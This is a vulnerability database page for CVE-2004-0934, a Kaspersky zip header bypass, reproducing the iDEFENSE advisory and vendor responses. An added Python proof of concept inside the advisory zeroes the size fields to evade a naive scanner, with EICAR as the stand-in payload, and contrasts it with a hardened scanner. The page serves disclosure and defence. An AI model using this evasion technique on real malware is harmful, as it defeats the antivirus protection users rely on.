CVE-2004-0934
CVSS 7.5
Published: 2005-01-27 00:00:00
Revised: 2008-09-05 16:39:50

[Original] Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.


[CNNVD] Kaspersky zip file detection bypass vulnerability (CNNVD-200501-310)

        Kaspersky is a well-known anti-virus product.
        Kaspersky 3.x and 4.x mishandle .zip archives, which allows anti-virus scanning to be bypassed.
        An attacker can craft a zip archive whose uncompressed-size field is set to zero in both the local file header and the central directory entry (the "global header"); the scanner then treats the entry as empty, yet the archive still extracts normally.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources possible]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Note: this list mirrors the NVD configuration data and includes products from the other vendors covered by the same iDEFENSE advisory (McAfee, Computer Associates, Sophos, Eset, RAV); those have their own identifiers (see section VII of the advisory below), while CVE-2004-0934 itself is the Kaspersky entry.

cpe:/o:mandrakesoft:mandrake_linux:10.1  MandrakeSoft Mandrake Linux 10.1
cpe:/a:ca:etrust_intrusion_detection:1.4.1.13  Computer Associates eTrust Intrusion Detection 1.4.1.13
cpe:/a:ca:etrust_antivirus:7.1  Computer Associates eTrust Antivirus 7.1
cpe:/a:sophos:sophos_anti-virus:3.78d  Sophos Anti-Virus 3.78d
cpe:/a:rav_antivirus:rav_antivirus_for_file_servers:1.0
cpe:/a:sophos:sophos_puremessage_anti-virus:4.6
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/a:sophos:sophos_anti-virus:3.84  Sophos Anti-Virus 3.84
cpe:/a:sophos:sophos_anti-virus:3.82  Sophos Anti-Virus 3.82
cpe:/a:ca:etrust_antivirus_gateway:7.0  Computer Associates eTrust Antivirus Gateway 7.0
cpe:/o:suse:suse_linux:9.2  SuSE Linux 9.2
cpe:/a:sophos:sophos_anti-virus:3.78  Sophos Anti-Virus 3.78
cpe:/a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2
cpe:/a:sophos:sophos_anti-virus:3.86  Sophos Anti-Virus 3.86
cpe:/a:ca:etrust_secure_content_manager:1.1  Computer Associates eTrust Secure Content Manager 1.1
cpe:/a:rav_antivirus:rav_antivirus_desktop:8.6
cpe:/a:sophos:sophos_anti-virus:3.4.6  Sophos Anti-Virus 3.4.6
cpe:/a:sophos:sophos_anti-virus:3.83  Sophos Anti-Virus 3.83
cpe:/o:gentoo:linux  Gentoo Linux
cpe:/a:sophos:sophos_small_business_suite:1.0
cpe:/a:kaspersky_lab:kaspersky_anti-virus:4.0
cpe:/a:ca:etrust_ez_antivirus:6.3  Computer Associates eTrust EZ Antivirus 6.3
cpe:/a:ca:etrust_ez_antivirus:6.2  Computer Associates eTrust EZ Antivirus 6.2
cpe:/a:ca:etrust_ez_armor:2.0  Computer Associates eTrust EZ Armor 2.0
cpe:/a:sophos:sophos_anti-virus:3.80  Sophos Anti-Virus 3.80
cpe:/a:mcafee:antivirus_engine:4.3.20  McAfee Antivirus Engine 4.3.20
cpe:/a:ca:etrust_antivirus_gateway:7.1  Computer Associates eTrust Antivirus Gateway 7.1
cpe:/a:archive_zip:archive_zip:1.13
cpe:/a:ca:etrust_antivirus:7.0_sp2
cpe:/a:ca:inoculateit:6.0  Computer Associates InoculateIT 6.0
cpe:/a:eset_software:nod32_antivirus:1.0.11
cpe:/a:eset_software:nod32_antivirus:1.0.13
cpe:/a:eset_software:nod32_antivirus:1.0.12
cpe:/a:ca:etrust_intrusion_detection:1.4.5  Computer Associates eTrust Intrusion Detection 1.4.5
cpe:/a:ca:etrust_secure_content_manager:1.0  Computer Associates eTrust Secure Content Manager 1.0
cpe:/a:ca:etrust_ez_armor:2.3  Computer Associates eTrust EZ Armor 2.3
cpe:/a:ca:etrust_ez_antivirus:6.1  Computer Associates eTrust EZ Antivirus 6.1
cpe:/a:ca:etrust_ez_armor:2.4  Computer Associates eTrust EZ Armor 2.4
cpe:/a:ca:etrust_intrusion_detection:1.5  Computer Associates eTrust Intrusion Detection 1.5
cpe:/a:ca:etrust_antivirus:7.0  Computer Associates eTrust Antivirus 7.0
cpe:/a:sophos:sophos_anti-virus:3.81  Sophos Anti-Virus 3.81
cpe:/a:ca:brightstor_arcserve_backup:11.1  Computer Associates BrightStor ARCserve Backup 11.1
cpe:/o:gentoo:linux:1.4  Gentoo Linux 1.4
cpe:/a:sophos:sophos_anti-virus:3.85  Sophos Anti-Virus 3.85
cpe:/a:kaspersky_lab:kaspersky_anti-virus:5.0
cpe:/a:ca:etrust_secure_content_manager:1.0:sp1
cpe:/a:kaspersky_lab:kaspersky_anti-virus:3.0
cpe:/a:sophos:sophos_anti-virus:3.79  Sophos Anti-Virus 3.79

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0934
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0934
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-310
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/968818
(UNKNOWN)  CERT-VN  VU#968818
http://www.securityfocus.com/bid/11448
(VENDOR_ADVISORY)  BID  11448
http://xforce.iss.net/xforce/xfdb/17761
(VENDOR_ADVISORY)  XF  antivirus-zip-protection-bypass(17761)
http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20041018 Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

- Vulnerability information

Kaspersky zip file detection bypass vulnerability
Severity: High    Type: Design error
2005-01-27 00:00:00    2006-12-21 00:00:00
Remote

- Advisories and patches

        The vendor has released an update for this issue; it can be obtained from:
        http://www.kaspersky.com/
        Per Kaspersky's response in the iDEFENSE advisory reproduced below, the fix for scanners on the 3.x/4.x engines was scheduled for the next (not the then-current) cumulative update, and users of the 5.0 engine were directed to the maintenance pack planned for October 2004.

- Vulnerability information (F34757)

iDEFENSE Security Advisory 2004-10-18.t (PacketStormID:F34757)
2004-10-26 00:00:00
iDefense Labs  idefense.com
advisory,local,virus
CVE-2004-0934

iDEFENSE Security Advisory 10.18.04: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability. Multiple anti-virus vendors including McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV are affected. The problem specifically exists in the parsing of .zip archive headers. It is possible to modify the uncompressed size of archived files in both the local and global header without affecting functionality. An attacker can compress a malicious payload and evade detection by some anti-virus software by modifying the uncompressed size within the local and global headers to zero.

Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

iDEFENSE Security Advisory 10.18.04:

I. BACKGROUND

This vulnerability affects multiple anti-virus vendors including McAfee,
Computer Associates, Kaspersky, Sophos, Eset and RAV.

II. DESCRIPTION

Remote exploitation of an exceptional condition error in multiple
vendors' anti-virus software allows attackers to bypass security
protections by evading virus detection.

The problem specifically exists in the parsing of .zip archive headers.
The .zip file format stores information about each compressed file in
two places: a local file header and a central directory entry (called
the "global header" in this advisory). The local header sits immediately
before the compressed data of each file; the central directory is written
near the end of the archive, followed by the end-of-central-directory
record that points to it. Both records carry an uncompressed-size field.
It is possible to set the uncompressed size of archived files to zero in
both the local header and the central directory entry without affecting
functionality: the compressed size and CRC remain correct, and extractors
that inflate the deflate stream to its end still recover the file intact.
This has been confirmed with both WinZip and Microsoft Compressed Folders.
An attacker can compress a malicious payload and evade detection by
anti-virus engines that trust the declared uncompressed size, since such
an engine treats the entry as an empty file and scans nothing.
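The header manipulation described above (and summarized in the CNNVD entry at the top of this page), as an added example that is not iDEFENSE's, Kaspersky's or any other vendor's code. It writes a one-entry deflate archive by hand so that the uncompressed-size field can be zeroed in both the local file header and the central directory entry, shows that the entry still inflates to the original bytes, and contrasts a scanner that trusts the declared size (it sees a zero-length file and reports the archive clean) with one that inflates whatever stream is actually present and treats a size or CRC mismatch as malformed. The EICAR test string stands in for the malicious payload; the zip layout constants and both scanners are my own construction, not any vendor's engine.

```python
"""Added example: reproduce the zero-size .zip header evasion and compare a
header-trusting scanner with a hardened one. Python 3 standard library only."""
import struct
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
# Constructed sample payload: the 68-byte EICAR anti-virus test string.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def build_zip(name: bytes, data: bytes, zero_sizes: bool = False) -> bytes:
    """One-entry deflate archive written by hand. zero_sizes=True applies the
    advisory's trick: the uncompressed-size field becomes 0 in BOTH the local
    file header and the central directory entry, while CRC-32 and compressed
    size stay correct. No data descriptors (general-purpose flag bit 3 clear),
    so the sizes live in the headers themselves."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw deflate = method 8
    cdata = comp.compress(data) + comp.flush()
    crc, usize = zlib.crc32(data), (0 if zero_sizes else len(data))
    local = struct.pack("<4sHHHHHIIIHH", LOCAL_SIG, 20, 0, 8, 0, 0,
                        crc, len(cdata), usize, len(name), 0) + name
    central = struct.pack("<4sHHHHHHIIIHHHHHII", CENTRAL_SIG, 20, 20, 0, 8, 0, 0,
                          crc, len(cdata), usize, len(name), 0, 0, 0, 0, 0,
                          0) + name                     # local header at offset 0
    eocd = struct.pack("<4sHHHHIIH", EOCD_SIG, 0, 0, 1, 1, len(central),
                       len(local) + len(cdata), 0)
    return local + cdata + central + eocd


def central_entries(blob: bytes):
    """Yield (name, crc, usize, local_offset) per central directory entry (the
    advisory's 'global header'), found via the end-of-central-directory record."""
    eocd = blob.rfind(EOCD_SIG)
    _, _, _, _, count, _, pos, _ = struct.unpack("<4sHHHHIIH", blob[eocd:eocd + 22])
    for _ in range(count):
        f = struct.unpack("<4sHHHHHHIIIHHHHHII", blob[pos:pos + 46])
        if f[0] != CENTRAL_SIG:
            raise ValueError("bad central directory entry")
        yield blob[pos + 46:pos + 46 + f[10]], f[7], f[9], f[16]
        pos += 46 + f[10] + f[11] + f[12]    # skip name, extra, comment


def local_payload(blob: bytes, off: int):
    """Parse the local file header at off; return (declared usize, compressed bytes)."""
    f = struct.unpack("<4sHHHHHIIIHH", blob[off:off + 30])
    if f[0] != LOCAL_SIG:
        raise ValueError("bad local file header")
    start = off + 30 + f[9] + f[10]          # skip name and extra field
    return f[8], blob[start:start + f[7]]    # f[7] = compressed size


def naive_scan(blob: bytes, signature: bytes = EICAR) -> bool:
    """Vulnerable pattern: output is sized from the declared uncompressed size
    and only that many bytes are examined. With usize == 0 the entry looks
    like an empty file and the archive is reported clean."""
    for _name, _crc, usize, off in central_entries(blob):
        _, cdata = local_payload(blob, off)
        content = zlib.decompressobj(-15).decompress(cdata)[:usize]
        if signature in content:
            return True
    return False


def robust_scan(blob: bytes, signature: bytes = EICAR, max_out: int = 16 << 20) -> str:
    """Hardened pattern: inflate whatever stream is actually present (bounded by
    an explicit output cap, which also blunts decompression bombs), scan all of
    it, and treat any disagreement between headers and content as malformed."""
    for _name, crc, usize, off in central_entries(blob):
        _, cdata = local_payload(blob, off)
        content = zlib.decompressobj(-15).decompress(cdata, max_out)
        if signature in content:
            return "detected"
        if len(content) != usize or zlib.crc32(content) != crc:
            return "malformed"   # headers lie about the payload: block, do not pass
    return "clean"


def extract_all(blob: bytes) -> dict:
    """What the extractors named in the advisory effectively do: inflate until
    the deflate stream ends, so the tampered archive still opens normally."""
    out = {}
    for name, _crc, _usize, off in central_entries(blob):
        _, cdata = local_payload(blob, off)
        out[name] = zlib.decompress(cdata, -15)
    return out


if __name__ == "__main__":
    evasive = build_zip(b"eicar.com", EICAR, zero_sizes=True)
    print("naive scanner detects :", naive_scan(evasive))    # False
    print("robust scanner verdict:", robust_scan(evasive))   # detected
    print("extracts intact       :", extract_all(evasive)[b"eicar.com"] == EICAR)  # True
```

Run it with Python 3 as-is. The output cap in robust_scan is the other half of a hardened archive scanner: once the declared size is no longer trusted, the inflater has to be bounded by something else, or a tiny archive can be used to exhaust memory instead of hiding a payload.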

III. ANALYSIS

Successful exploitation allows remote attackers to pass malicious
payloads within a compressed archive to a target without being detected.
Most anti-virus engines have the ability to scan content packaged with
compressed archives. As such, users with up-to-date anti-virus software
are more likely to open attachments and files if they are under the
false impression that the archive was already scanned and found to not
contain a virus.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in the latest
versions of the engines provided by McAfee, Computer Associates,
Kaspersky, Sophos, Eset and RAV. The Vendor Responses section of this
advisory contains details on the status of specific vendor fixes for
this issue.

iDEFENSE has confirmed that the latest versions of the engines provided
by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable.

V. WORKAROUND

Filter all compressed file archives (.zip) at border gateways,
regardless of content.

VI. VENDOR RESPONSES

McAfee
"The McAfee scan engine has always been a market leader in detection of
viruses, worms and Trojans within compressed and archived file formats.
As such the mechanism used for the detection of such payloads has been
designed to ensure all archive files are thoroughly scanned at each
nested level in the file to ensure that all appropriate parts of the
file are scanned.

McAfee is aware of a proof of concept exploitation in Zip archive
payloads where information in the local header part of the archive is
modified.

The local header exists just before the compressed data of each file. It
is possible to modify the uncompressed size of archived files in the
local header without affecting functionality.  Consequently there is the
potential for a malicious payload to be hidden and avoid anti-virus
detection by modifying the uncompressed size within the local headers to
zero.

The techniques used by McAfee to analyze Zip archives have allowed a
comprehensive solution for the Zip file format vulnerability to be
provided to protect customers.

The latest update for the current 4320 McAfee Anti-Virus Engine DATS
drivers (Version 4398 released on Oct 13th 2004) further enhances the
protection afforded to McAfee customers against such potential exploits.

A DATS Driver update issued in Version 4397 (October 6th 2004) provided
early protection for the same potential exploit targeted specifically
for Gateway and Command line scanning.

If a detection of this type of exploit is found it will trigger the
message "Found the Exploit-Zip Trojan!" to be displayed.

Updates for the DAT files mentioned above can be located at the
following links:

Home (Retail) Users:
http://download.mcafee.com/uk/updates/updates.asp

Business (Enterprise) Users:
http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1

It should be noted that whilst McAfee take the potential for this
exploit to be used maliciously seriously, to date no evidence of such an
exploit has been discovered. McAfee has provided additional protection
through the DATS driver update however with usage of the comprehensive
suite of anti-virus protection strategies provided by McAfee products,
McAfee is confident that this exploit presented no additional threat
to its customers.

It should be noted that with McAfee on-access scanning active, such
modification for malicious purposes to hide payloads only delays
eventual detection - McAfee on-access detection will detect any payload
with malicious intent as malware.

McAfee continues to focus on ensuring that customers receive maximum
protection and provide a rapid response to all potential vulnerabilities
thus ensuring customer satisfaction."

Computer Associates
"With the assistance of iDEFENSE, Computer Associates has identified a
medium-risk vulnerability in a shared component of eTrust Antivirus
which may allow a specially crafted .ZIP file to bypass virus detection.
A number of CA products embed this technology including solutions from
eTrust, Brightstor and others.

Customers are encouraged to visit the CA support web site below for more
information about this vulnerability, a list of products and platforms
that are affected, and remediation procedures.
http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp.

At Computer Associates, every reported exposure is handled with the
utmost urgency. We strive to ensure that no customer is left in a
vulnerable situation."

Kaspersky
(09/24/2004)
"...this bug for scanners based on 3.x-4.x engines will be fixed in next
(not current) cumulative update.

For scanners based on new 5.0 engine we recommend that you wait for the
release of our next maintenance pack. We are going to release it in
October."

Sophos
"A vulnerability has been discovered in Sophos's handling of Zip archive
files, whereby a Zip file can be deliberately altered to prevent
accurate scanning by Sophos anti-virus products of its contents.

Although theoretically a risk, Sophos has not seen any examples of
malware attempting to employ this vulnerability.

Furthermore, the vulnerability does not prevent Sophos's desktop
on-access scanner from correctly detecting viruses (and preventing
actual infection) which manage to bypass the email gateway software, so
the risks of infection are very small.

Sophos has enhanced its scan engine to deal with malformed Zip files.
Version 3.87.0 of Sophos Anti-Virus on all operating system platforms
except Windows 95/98/Me includes this fix and customers will be
automatically updated to this version via EM Library from Wednesday 20
October 2004.  Additionally, a version of the software will be available
for download from the Sophos website from Friday 22 October 2004.

Sophos Anti-Virus for Windows 95/98/Me customers will be updated with
the fix from version 3.88.0 (available from 24 November 2004).

Sophos thanks iDEFENSE for their assistance in identifying this
vulnerability."

Eset
"The vulnerability was caused by the fact that some archive
compression/decompression software (including Winzip) incorrectly
handles compressed files with deliberately damaged header fields, thus,
in fact, allowing creation of damaged archive files that could be
automatically repaired on the victim's computer without notifying the
user.

Eset has made appropriate modifications to archive-scanning code to
handle such kind of archives immediately after receiving notification
from iDEFENSE. These changes are contained in archive-support module
version 1.020, released on 16th September 2004 at 21:00 CET. The update
was available for all clients with Automatic Virus-Signatures Update
set."

RAV
No vendor response

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to these issues:

CAN-2004-0932 - McAfee
CAN-2004-0933 - Computer Associates
CAN-2004-0934 - Kaspersky
CAN-2004-0937 - Sophos
CAN-2004-0935 - Eset
CAN-2004-0936 - RAV

These are candidates for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/16/2004  Initial vendor notification
09/16/2004  iDEFENSE clients notified
10/18/2004  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright © 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.